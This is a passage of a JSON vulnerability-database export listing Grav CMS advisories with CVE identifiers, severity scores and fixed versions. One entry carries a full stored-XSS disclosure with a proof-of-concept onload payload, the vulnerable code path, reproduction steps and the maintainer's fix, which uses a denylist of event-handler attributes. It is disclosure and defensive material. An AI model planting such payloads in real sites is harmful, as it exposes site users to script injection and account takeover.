"reference_id": "", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42842" }, { "reference_url": "https://github.com/advisories/GHSA-c2q3-p4jr-c55f", "reference_id": "GHSA-c2q3-p4jr-c55f", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-c2q3-p4jr-c55f" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/110986?format=api", "purl": "pkg:composer/getgrav/grav@2.0.0-beta.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-aa7e-n85b-wbdm" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@2.0.0-beta.2" } ], "aliases": [ "CVE-2026-42842", "GHSA-c2q3-p4jr-c55f" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-u7yn-d7uj-57bh" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/49309?format=api", "vulnerability_id": "VCID-v8u1-nbxw-a7fr", "summary": "Grav Admin Plugin is vulnerable to Cross-Site Scripting (XSS) Stored endpoint `/admin/accounts/groups/[group]` parameter `data[readableName]`\nA Stored Cross-Site Scripting (XSS) vulnerability was identified in the `/admin/accounts/groups/Grupo` endpoint of the _Grav_ application. This vulnerability allows attackers to inject malicious scripts into the `data[readableName]` parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.\n\n---", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-66312", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00024", "scoring_system": "epss", "scoring_elements": "0.07273", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-66312" }, { "reference_url": "https://github.com/getgrav/grav", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:A/VC:L/VI:L/VA:N/SC:H/SI:H/SA:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/getgrav/grav" }, { "reference_url": "https://github.com/getgrav/grav-plugin-admin/commit/99f653296504f1d6408510dd2f6f20a45a26f9b0", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:A/VC:L/VI:L/VA:N/SC:H/SI:H/SA:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-12-02T14:36:06Z/" } ], "url": "https://github.com/getgrav/grav-plugin-admin/commit/99f653296504f1d6408510dd2f6f20a45a26f9b0" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66312", "reference_id": "CVE-2025-66312", "reference_type": "", "scores": [ { "value": "6.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:A/VC:L/VI:L/VA:N/SC:H/SI:H/SA:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66312" }, { "reference_url": "https://github.com/advisories/GHSA-rmw5-f87r-w988", "reference_id": "GHSA-rmw5-f87r-w988", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-rmw5-f87r-w988" }, { "reference_url": "https://github.com/getgrav/grav/security/advisories/GHSA-rmw5-f87r-w988", "reference_id": "GHSA-rmw5-f87r-w988", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "6.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:A/VC:L/VI:L/VA:N/SC:H/SI:H/SA:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-12-02T14:36:06Z/" } ], "url": "https://github.com/getgrav/grav/security/advisories/GHSA-rmw5-f87r-w988" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/72694?format=api", "purl": "pkg:composer/getgrav/grav@1.8.0-beta.27", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-6a4v-d3zb-67cq" }, { "vulnerability": "VCID-6quf-qqqk-43a1" }, { "vulnerability": "VCID-6tq3-4hkt-y3au" }, { "vulnerability": "VCID-aa7e-n85b-wbdm" }, { "vulnerability": "VCID-agks-r1vd-u3d6" }, { "vulnerability": "VCID-athb-nf3a-yyga" }, { "vulnerability": "VCID-c9jy-y2dh-x3dg" }, { "vulnerability": "VCID-e61c-rd9y-wyhs" }, { "vulnerability": "VCID-r2dh-em54-nyfz" }, { "vulnerability": "VCID-rcyu-yu31-n7gu" }, { "vulnerability": "VCID-seer-x4fd-e7ge" }, { "vulnerability": "VCID-tkxm-vt8p-tqgv" }, { "vulnerability": "VCID-u7yn-d7uj-57bh" }, { "vulnerability": "VCID-xj7v-ry9d-dfh1" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.8.0-beta.27" } ], "aliases": [ "CVE-2025-66312", "GHSA-rmw5-f87r-w988" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-v8u1-nbxw-a7fr" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/49314?format=api", "vulnerability_id": "VCID-v9n7-vann-6fa5", "summary": "Grav is vulnerable to Cross-Site Scripting (XSS) Reflected endpoint /admin/pages/[page], parameter data[header][content][items], located in the \"Blog Config\" tab\nA Reflected Cross-Site Scripting (XSS) vulnerability was identified in the `/admin/pages/[page]` endpoint of the _Grav_ application. This vulnerability allows attackers to inject malicious scripts into the `data[header][content][items]` parameter.\n\n---", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-66309", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00032", "scoring_system": "epss", "scoring_elements": "0.09585", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-66309" }, { "reference_url": "https://github.com/getgrav/grav", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:A/VC:L/VI:L/VA:N/SC:H/SI:H/SA:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/getgrav/grav" }, { "reference_url": "https://github.com/getgrav/grav-plugin-admin/commit/99f653296504f1d6408510dd2f6f20a45a26f9b0", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:A/VC:L/VI:L/VA:N/SC:H/SI:H/SA:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-12-02T16:12:10Z/" } ], "url": "https://github.com/getgrav/grav-plugin-admin/commit/99f653296504f1d6408510dd2f6f20a45a26f9b0" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66309", "reference_id": "CVE-2025-66309", "reference_type": "", "scores": [ { "value": "6.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:A/VC:L/VI:L/VA:N/SC:H/SI:H/SA:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66309" }, { "reference_url": "https://github.com/advisories/GHSA-65mj-f7p4-wggq", "reference_id": "GHSA-65mj-f7p4-wggq", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-65mj-f7p4-wggq" }, { "reference_url": "https://github.com/getgrav/grav/security/advisories/GHSA-65mj-f7p4-wggq", "reference_id": "GHSA-65mj-f7p4-wggq", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "6.2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:A/VC:L/VI:L/VA:N/SC:H/SI:H/SA:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-12-02T16:12:10Z/" } ], "url": "https://github.com/getgrav/grav/security/advisories/GHSA-65mj-f7p4-wggq" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/72694?format=api", "purl": "pkg:composer/getgrav/grav@1.8.0-beta.27", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-6a4v-d3zb-67cq" }, { "vulnerability": "VCID-6quf-qqqk-43a1" }, { "vulnerability": "VCID-6tq3-4hkt-y3au" }, { "vulnerability": "VCID-aa7e-n85b-wbdm" }, { "vulnerability": "VCID-agks-r1vd-u3d6" }, { "vulnerability": "VCID-athb-nf3a-yyga" }, { "vulnerability": "VCID-c9jy-y2dh-x3dg" }, { "vulnerability": "VCID-e61c-rd9y-wyhs" }, { "vulnerability": "VCID-r2dh-em54-nyfz" }, { "vulnerability": "VCID-rcyu-yu31-n7gu" }, { "vulnerability": "VCID-seer-x4fd-e7ge" }, { "vulnerability": "VCID-tkxm-vt8p-tqgv" }, { "vulnerability": "VCID-u7yn-d7uj-57bh" }, { "vulnerability": "VCID-xj7v-ry9d-dfh1" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.8.0-beta.27" } ], "aliases": [ "CVE-2025-66309", "GHSA-65mj-f7p4-wggq" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-v9n7-vann-6fa5" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/49306?format=api", "vulnerability_id": "VCID-vm87-35gf-eyft", "summary": "Grav is vulnerable to RCE via SSTI through Twig Sandbox Bypass\nA Server-Side Template Injection (SSTI) vulnerability exists in Grav that allows authenticated attackers with editor permissions to execute arbitrary commands on the server and, under certain conditions, may also be exploited by unauthenticated attackers. This vulnerability stems from weak regex validation in the `cleanDangerousTwig` method.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-66294", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.37646", "scoring_system": "epss", "scoring_elements": "0.97286", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-66294" }, { "reference_url": "https://github.com/getgrav/grav", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/getgrav/grav" }, { "reference_url": "https://github.com/getgrav/grav/commit/e37259527d9c1deb6200f8967197a9fa587c6458", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-12-02T14:05:10Z/" } ], "url": "https://github.com/getgrav/grav/commit/e37259527d9c1deb6200f8967197a9fa587c6458" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66294", "reference_id": "CVE-2025-66294", "reference_type": "", "scores": [ { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66294" }, { "reference_url": "https://github.com/advisories/GHSA-662m-56v4-3r8f", "reference_id": "GHSA-662m-56v4-3r8f", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-662m-56v4-3r8f" }, { "reference_url": "https://github.com/getgrav/grav/security/advisories/GHSA-662m-56v4-3r8f", "reference_id": "GHSA-662m-56v4-3r8f", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-12-02T14:05:10Z/" } ], "url": "https://github.com/getgrav/grav/security/advisories/GHSA-662m-56v4-3r8f" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/72694?format=api", "purl": "pkg:composer/getgrav/grav@1.8.0-beta.27", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-6a4v-d3zb-67cq" }, { "vulnerability": "VCID-6quf-qqqk-43a1" }, { "vulnerability": "VCID-6tq3-4hkt-y3au" }, { "vulnerability": "VCID-aa7e-n85b-wbdm" }, { "vulnerability": "VCID-agks-r1vd-u3d6" }, { "vulnerability": "VCID-athb-nf3a-yyga" }, { "vulnerability": "VCID-c9jy-y2dh-x3dg" }, { "vulnerability": "VCID-e61c-rd9y-wyhs" }, { "vulnerability": "VCID-r2dh-em54-nyfz" }, { "vulnerability": "VCID-rcyu-yu31-n7gu" }, { "vulnerability": "VCID-seer-x4fd-e7ge" }, { "vulnerability": "VCID-tkxm-vt8p-tqgv" }, { "vulnerability": "VCID-u7yn-d7uj-57bh" }, { "vulnerability": "VCID-xj7v-ry9d-dfh1" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.8.0-beta.27" } ], "aliases": [ "CVE-2025-66294", "GHSA-662m-56v4-3r8f" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-vm87-35gf-eyft" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/92153?format=api", "vulnerability_id": "VCID-xj7v-ry9d-dfh1", "summary": "Grav CMS vulnerable to stored XSS via Markdown media attribute() action\n### Summary\n\nAn authenticated user with page editing permissions can inject an executable JavaScript event-handler attribute into rendered image HTML through Grav's Markdown media action syntax.\n\nThe issue is caused by Markdown image query parameters being converted into callable media actions. The public `attribute()` media method can be reached this way, allowing an editor to set an arbitrary HTML attribute name and value on the generated image element.\n\nFor example, this Markdown:\n\n```markdown\n)\n```\n\nis rendered as an image tag containing an executable `onload` handler:\n\n```html\n<img onload=\"alert(document.domain)\" alt=\"Quarterly market overview\" src=\"/user/pages/03.campaigns/market-overview.gif?...\">\n```\n\nThis results in stored XSS when another user views the affected page. In a multi-user Grav installation, a lower-privileged page editor could use this to target administrators or reviewers who preview or view editor-controlled content.\n\nTested versions:\n\n- Grav CMS: 1.7.49.5\n- Admin Plugin: 1.10.49.1\n\nSuggested classification:\n\n- CWE-79: Improper Neutralization of Input During Web Page Generation\n- Stored Cross-Site Scripting\n- Suggested CVSS v4.0 score if page editing is considered high privilege: 6.9 Medium\n- Suggested CVSS v4.0 vector: `CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:P/VC:H/VI:L/VA:N/SC:H/SI:L/SA:N`\n- Suggested CVSS v3.1 score if page editing is considered high privilege: 6.9 Medium\n- Suggested CVSS v3.1 vector: `CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:N`\n\n### Details\n\nThe issue appears to come from this source-to-sink flow:\n\n1. `ParsedownGravTrait::inlineImage()` processes Markdown images.\n2. `Excerpts::processImageExcerpt()` resolves the referenced media object.\n3. `Excerpts::processMediaActions()` parses the image URL query string into media actions.\n4. `call_user_func_array()` invokes the requested action method on the media object.\n5. `MediaObjectTrait::attribute()` stores the attacker-controlled attribute name and value.\n6. The media object returns a Parsedown element containing the injected attribute.\n7. Parsedown renders the attribute name into the final HTML.\n\nRelevant code paths:\n\n```text\nsystem/src/Grav/Common/Markdown/ParsedownGravTrait.php\nsystem/src/Grav/Common/Page/Markdown/Excerpts.php\nsystem/src/Grav/Common/Media/Traits/MediaObjectTrait.php\nsystem/src/Grav/Common/Page/Medium/StaticImageMedium.php\nsystem/src/Grav/Common/Page/Medium/ImageMedium.php\nvendor/erusev/parsedown/Parsedown.php\n```\n\nIn `system/src/Grav/Common/Markdown/ParsedownGravTrait.php`, Markdown image excerpts are passed into Grav-specific media handling:\n\n```php\nif (isset($excerpt['element']['attributes']['src'])) {\n $excerpt = $this->excerpts->processImageExcerpt($excerpt);\n}\n```\n\nIn `system/src/Grav/Common/Page/Markdown/Excerpts.php`, query string parameters are converted into media action calls. The query parameter name becomes the method name:\n\n```php\n$carry[] = ['method' => $parts[0], 'params' => $value];\n```\n\nThe requested method is later invoked dynamically:\n\n```php\n$medium = call_user_func_array([$medium, $action['method']], $args);\n```\n\nFor the payload:\n\n```text\nattribute=onload,alert(document.domain)\n```\n\nthe method is `attribute`, and the arguments are `onload` and `alert(document.domain)`.\n\nIn `system/src/Grav/Common/Media/Traits/MediaObjectTrait.php`, `attribute()` stores the caller-controlled attribute name directly:\n\n```php\npublic function attribute($attribute = null, $value = '')\n{\n if (!empty($attribute)) {\n $this->attributes[$attribute] = $value;\n }\n return $this;\n}\n```\n\nThe image media classes then return the collected attributes as attributes for an `img` element.\n\nIn `system/src/Grav/Common/Page/Medium/StaticImageMedium.php`:\n\n```php\nreturn ['name' => 'img', 'attributes' => $attributes];\n```\n\nThe non-static image path in `system/src/Grav/Common/Page/Medium/ImageMedium.php` also returns image attributes in the same way.\n\nFinally, in `vendor/erusev/parsedown/Parsedown.php`, the attribute value is escaped, but the attribute name is rendered as-is:\n\n```php\n$markup .= ' '.$name.'=\"'.self::escape($value).'\"';\n```\n\nAs a result, the attacker-controlled attribute name `onload` is emitted into the final HTML and executes as a browser event handler.\n\nThe Admin Plugin's save-time XSS detection does not appear to block this because the stored content is Markdown media syntax, not raw HTML:\n\n```markdown\n)\n```\n\nThe dangerous HTML is generated later during Markdown/media rendering.\n\n### PoC\n\nI reproduced this on a standard Grav CMS installation with the Admin Plugin enabled.\n\nConfiguration and prerequisites:\n\n- Grav CMS 1.7.49.5\n- Admin Plugin 1.10.49.1\n- Markdown processing enabled for pages\n- A user account with permission to create or edit pages\n- A page media file available in the edited page folder, for example `market-overview.gif`\n\nSteps to reproduce:\n\n1. Install Grav CMS with the Admin Plugin.\n2. Log in to the Admin panel as a user who can create or edit pages.\n3. Create a normal content page or edit an existing one.\n4. Add or reference a page media file named `market-overview.gif`.\n5. Insert the following Markdown into the page body:\n\n ```markdown\n )\n ```\n\n6. Save the page.\n7. Open the rendered frontend page in a browser.\n8. The JavaScript payload executes when the image loads.\n9. Inspect the generated DOM. The rendered image element contains the injected `onload` attribute.\n\nExpected result:\n\nThe Markdown media action should not be able to generate executable HTML attributes. The payload should be rejected, sanitized, or rendered without the dangerous event-handler attribute.\n\nActual result:\n\nThe payload is accepted and rendered as an executable image event handler:\n\n```html\n<img onload=\"alert(document.domain)\" alt=\"Quarterly market overview\" src=\"/user/pages/03.campaigns/market-overview.gif?...\">\n```\n\nScreenshots:\n\n- the stored Markdown payload in the page editor\n<img width=\"1718\" height=\"1013\" alt=\"edycja\" src=\"https://github.com/user-attachments/assets/8f5e5275-e4ef-4d5e-a2cd-44683537b909\" />\n- the JavaScript alert executing on the frontend page\n<img width=\"1727\" height=\"1002\" alt=\"alert\" src=\"https://github.com/user-attachments/assets/6de81228-830c-49f2-ac41-b15658a8913d\" />\n- browser DevTools showing the injected `onload` attribute in the rendered DOM\n<img width=\"939\" height=\"539\" alt=\"inspect\" src=\"https://github.com/user-attachments/assets/7832c42d-6f3a-4ea2-b072-b837bd3913ed\" />\n\n### Impact\n\nThis is a stored cross-site scripting vulnerability.\n\nAn authenticated user with page editing permissions can store a malicious Markdown image reference. When the affected page is rendered, the payload executes in the browser of any user who views that page.\n\nIn multi-user Grav installations, this may allow a lower-privileged editor to target administrators, reviewers, or other privileged users who preview or view editor-controlled content. Depending on the victim's privileges and deployed plugins, successful exploitation may allow JavaScript execution in the site origin, access to same-origin page data available to the victim, and same-origin actions performed as the victim.\n\nCVSS 4.0 rationale:\n\n- `AV:N`: the issue is exploitable through the web application.\n- `AC:L`: no special race condition or complex setup is required after page editing access is obtained.\n- `AT:P`: exploitation requires the malicious Markdown/media reference to be stored in page content and later rendered to a victim.\n- `PR:H`: the attacker needs page editing capability.\n- `UI:P`: a victim must view the affected page. The demonstrated `onload` payload executes on passive page rendering, without requiring a click or form submission by the victim.\n- `VC:H/VI:L/VA:N`: confidentiality impact can be high when the victim is an administrator or reviewer; integrity impact is limited; no direct availability impact was demonstrated.\n- `SC:H/SI:L/SA:N`: the injected script executes in the browser/application context and may affect subsequent same-origin interactions available to the victim.\n\n## Maintainer note — fix applied (2026-04-24)\n\nFixed in Grav core on the `2.0` branch: commit [`5a12f9be8`](https://github.com/getgrav/grav/commit/5a12f9be8) — will ship in **2.0.0-beta.2**.\n\n**What changed:** `MediaObjectTrait::attribute()` — the sink reached by Markdown like `)` — now gates the attribute **name** through an allowlist regex (`^[A-Za-z][A-Za-z0-9_:.\\-]*$`) plus an explicit denylist of script-context names:\n\n- any `on*` handler (case-insensitive)\n- `style` (inline CSS expression risk)\n- `xmlns` (XML namespace tricks)\n- `srcdoc` (iframe sandbox bypass)\n- `formaction` (form action override)\n\nInvalid names are silently dropped — the attribute isn't stored, so it doesn't survive into the rendered `<img>`. `src`/`href`/`data-*`/`aria-*`/standard media attributes are unaffected.\n\n**Files:**\n- [`system/src/Grav/Common/Media/Traits/MediaObjectTrait.php`](https://github.com/getgrav/grav/blob/2.0/system/src/Grav/Common/Media/Traits/MediaObjectTrait.php) — new `isSafeAttributeName()` gate.\n- [`tests/unit/Grav/Common/Security/MediaAttributeSecurityTest.php`](https://github.com/getgrav/grav/blob/2.0/tests/unit/Grav/Common/Security/MediaAttributeSecurityTest.php) — 28 cases (14 dangerous-name rejections, 14 safe-name round-trips).\n\n### Discoverers\n\n@K-Czaplicki\n@morzelowski\n\n\n---", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42841", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00023", "scoring_system": "epss", "scoring_elements": "0.06793", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42841" }, { "reference_url": "https://github.com/getgrav/grav", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:P/VC:H/VI:L/VA:N/SC:H/SI:L/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/getgrav/grav" }, { "reference_url": "https://github.com/getgrav/grav/commit/5a12f9be8314682c8713e569e330f11805d0a663", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:P/VC:H/VI:L/VA:N/SC:H/SI:L/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-11T16:19:03Z/" } ], "url": "https://github.com/getgrav/grav/commit/5a12f9be8314682c8713e569e330f11805d0a663" }, { "reference_url": "https://github.com/getgrav/grav/security/advisories/GHSA-r7fx-8g49-7hhr", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:P/VC:H/VI:L/VA:N/SC:H/SI:L/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-11T16:19:03Z/" } ], "url": "https://github.com/getgrav/grav/security/advisories/GHSA-r7fx-8g49-7hhr" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42841", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:P/VC:H/VI:L/VA:N/SC:H/SI:L/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42841" }, { "reference_url": "https://github.com/advisories/GHSA-r7fx-8g49-7hhr", "reference_id": "GHSA-r7fx-8g49-7hhr", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-r7fx-8g49-7hhr" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/110986?format=api", "purl": "pkg:composer/getgrav/grav@2.0.0-beta.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-aa7e-n85b-wbdm" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@2.0.0-beta.2" } ], "aliases": [ "CVE-2026-42841", "GHSA-r7fx-8g49-7hhr" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-xj7v-ry9d-dfh1" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/49333?format=api", "vulnerability_id": "VCID-y7vc-cx37-7ubs", "summary": "Grav has Broken Access Control which allows an Editor to modify the page's YAML Frontmatter to alter form processing actions\nDue to a broken access control vulnerability in the `/admin/pages/{page_name}` endpoint, an editor ( user with full permissions to pages ) can change the functionality of a form after submission.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-66301", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.29124", "scoring_system": "epss", "scoring_elements": "0.96677", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-66301" }, { "reference_url": "https://github.com/getgrav/grav", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/getgrav/grav" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66301", "reference_id": "CVE-2025-66301", "reference_type": "", "scores": [ { "value": "8.6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66301" }, { "reference_url": "https://github.com/advisories/GHSA-v8x2-fjv7-8hjh", "reference_id": "GHSA-v8x2-fjv7-8hjh", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-v8x2-fjv7-8hjh" }, { "reference_url": "https://github.com/getgrav/grav/security/advisories/GHSA-v8x2-fjv7-8hjh", "reference_id": "GHSA-v8x2-fjv7-8hjh", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "8.6", "scoring_system": "cvssv4", 